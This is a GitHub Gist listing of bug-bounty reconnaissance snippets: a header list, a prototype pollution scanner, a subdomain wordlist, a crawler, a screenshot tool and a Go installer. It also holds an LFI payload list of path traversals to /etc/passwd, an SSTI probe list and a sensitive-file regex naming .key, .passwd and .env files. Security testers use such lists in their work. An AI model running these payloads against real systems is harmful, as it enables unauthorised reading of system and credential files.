Skip to content

Instantly share code, notes, and snippets.

View R0X4R's full-sized avatar
🔥
Wake. Eat. Hack. Repeat

Eshan Singh R0X4R

🔥
Wake. Eat. Hack. Repeat
284 followers · 4 following
View GitHub Profile
@R0X4R
R0X4R / headers.txt
Last active November 3, 2021 00:02
Updated
X-Forwarded-For:
X-Originally-Forwarded-For:
X-Originating-Ip:
X-Originating:
True-Client-IP:
Referer:
X-WAP-Profile:
Host:
From:
X-Original-URL: http://
@R0X4R
R0X4R / protpscan.sh
Created July 5, 2021 09:45
A Prototype pollution vulnerability scanner
#!/bin/bash
targets=$1
mkdir -p protpscan
# requirements: https://github.com/detectify/page-fetch, https://github.com/tomnomnom/waybackurls, https://github.com/bp0lr/gauplus, https://github.com/R0X4R/Fuzzy, https://github.com/jaeles-project/gospider, https://snapcraft.io/chromium
# usage: subfinder -d target.com -all -silent | httpx -silent | anew -q /home/targets.txt && ./protpscan.sh /home/targets.txt
cd protpscan 2> /dev/null
echo -e "Total $(cat $targets | wc -l) domains loaded to scan"
echo -e "Increasing scope..."
xargs -a $targets -P 50 -I % bash -c "echo % | waybackurls" 2> /dev/null | anew -q wayback.txt
cat $targets | gauplus --random-agent -b eot,jpg,jpeg,gif,css,tif,tiff,png,ttf,otf,woff,woff2,ico,pdf,svg,txt -t 300 -o gauplus.txt &> /dev/null
@R0X4R
R0X4R / cudns.txt
Last active November 24, 2021 00:32
Custom common subdomains obtained from different sources
alpblog
www
%20%20%20%20s3
%20%20www
%20.
%20675-ybi-674
%20assets
%20b92
%20connect
%20databank
@R0X4R
R0X4R / taskkiller.sh
Created July 12, 2021 08:19
Helps you to kill unnecessary tasks running on linux and ubuntu.
#!/bin/bash
# Task Killer
# Helps you to kill unnecessary tasks running on linux and ubuntu.
echo -e "$1 - Killing task..."
totaltask=$(ps aux | grep "$1" | sed '/grep/d' | wc -l)
echo -e "Total $totaltask tasks found"
sleep 3s
ps aux | grep "$1" | sed '/grep/d' | awk '{print $2}' | while read -r line; do kill $line; done &> /dev/null
exit 1
@R0X4R
R0X4R / crawler.py
Last active September 8, 2022 05:35
Fetch all the links of the stdin links
# Import modules that'll be needed to run this tool
import requests
from bs4 import BeautifulSoup
from re import search
from sys import stdin, exit, stdout
from time import sleep
# Hide insecure request warning error
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
@R0X4R
R0X4R / chakshu.sh
Last active September 8, 2022 05:36
Takes websites screenshots using chromium browser
#!/bin/bash
# requirements: chromium or chrome browser (sudo apt update && sudo apt install snapd && sudo systemctl start snapd.service && sudo snap install chromium)
# usage: subfinder -d target.com -all -silent | httpx -silent | xargs -P 50 -I % bash -c "./chakshu.sh %"
echo -e "[CHAKSHU] - Taking screenshot of $1"
domain=$1
output=$(echo $1 | awk -F// '{print $NF}' | sed -E 's/[\.\|:]+/_/g')
mkdir -p screenshots
# all the screenshots will be saved in screenshots folder
/snap/bin/chromium --no-sandbox --headless --disable-gpu --window-size=1280,720 --screenshot $domain --screenshot=screenshots/$output.jpg > /dev/null 2>&1
exit 1
@R0X4R
R0X4R / lfipayloads.txt
Created July 2, 2021 07:52
LFI Payloads for lfi scanning
/etc/passwd
../../../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../etc/passwd
@R0X4R
R0X4R / sstipayloads.txt
Created July 2, 2021 07:54
SSTI Payloads list for ssti scanning
check-ssti{{7*7}}[[1*1]]
check-ssti{{7*7}}
check-ssti{{7*'7'}}
check-ssti<%= 7 * 7 %>
check-ssti${7*7}
check-ssti${{7*7}}
check-ssti@(7*7)
check-ssti#{7*7}
check-ssti#{ 7 * 7 }
@R0X4R
R0X4R / goinstaller.sh
Last active August 1, 2023 08:41
Go language installer for linux and debian systems.
#!/usr/bin/env bash
go_version=$(curl -ks https://golang.org/VERSION?m=text)
red_color="\e[31m"
green_color="\e[32m"
no_color="\e[0m"
type -P go &> /dev/null && echo -e "Current go version is ${green_color}$(go version | awk '{print $3}')${no_color}" || echo -e "${red_color}Go is not installed on your system${no_color}"
echo -e "Downloading latest go into your system - version ${green_color}${go_version}${no_color}"
sudo apt purge --auto-remove golang-go 2> /dev/null &> /dev/null
sudo apt clean &> /dev/null
wget https://dl.google.com/go/${go_version}.linux-amd64.tar.gz -q --no-check-certificate 2> /dev/null
@R0X4R
R0X4R / extensions.txt
Created May 20, 2021 15:04
Sensitive file extension
"([^.]+)\.zip$|([^.]+)\.zip\.[0-9]+$|([^.]+)\.zip[0-9]+$|([^.]+)\.zip[a-z][A-Z][0-9]+$|([^.]+)\.zip\.[a-z][A-Z][0-9]+$|([^.]+)\.rar$|([^.]+)\.tar$|([^.]+)\.tar\.gz$|([^.]+)\.tgz$|([^.]+)\.sql$|([^.]+)\.db$|([^.]+)\.sqlite$|([^.]+)\.pgsql\.txt$|([^.]+)\.mysql\.txt$|([^.]+)\.gz$|([^.]+)\.config$|([^.]+)\.log$|([^.]+)\.bak$|([^.]+)\.backup$|([^.]+)\.bkp$|([^.]+)\.crt$|([^.]+)\.dat$|([^.]+)\.eml$|([^.]+)\.java$|([^.]+)\.lst$|([^.]+)\.key$|([^.]+)\.passwd$|([^.]+)\.pl$|([^.]+)\.pwd$|([^.]+)\.mysql-connect$|([^.]+)\.jar$|([^.]+)\.cfg$|([^.]+)\.dir$|([^.]+)\.orig$|([^.]+)\.bz2$|([^.]+)\.old$|([^.]+)\.vbs$|([^.]+)\.img$|([^.]+)\.inf$|([^.]+)\.sh$|([^.]+)\.py$|([^.]+)\.vbproj$|([^.]+)\.mysql-pconnect$|([^.]+)\.war$|([^.]+)\.go$|([^.]+)\.psql$|([^.]+)\.sql\.gz$|([^.]+)\.vb$|([^.]+)\.webinfo$|([^.]+)\.jnlp$|([^.]+)\.cgi$|([^.]+)\.temp$|([^.]+)\.ini$|([^.]+)\.webproj$|([^.]+)\.xsql$|([^.]+)\.raw$|([^.]+)\.inc$|([^.]+)\.lck$|([^.]+)\.nz$|([^.]+)\.rc$|([^.]+)\.html\.gz$|([^.]+)\.gz$|([^.]+)\.env$|([^.]+)\.yml$"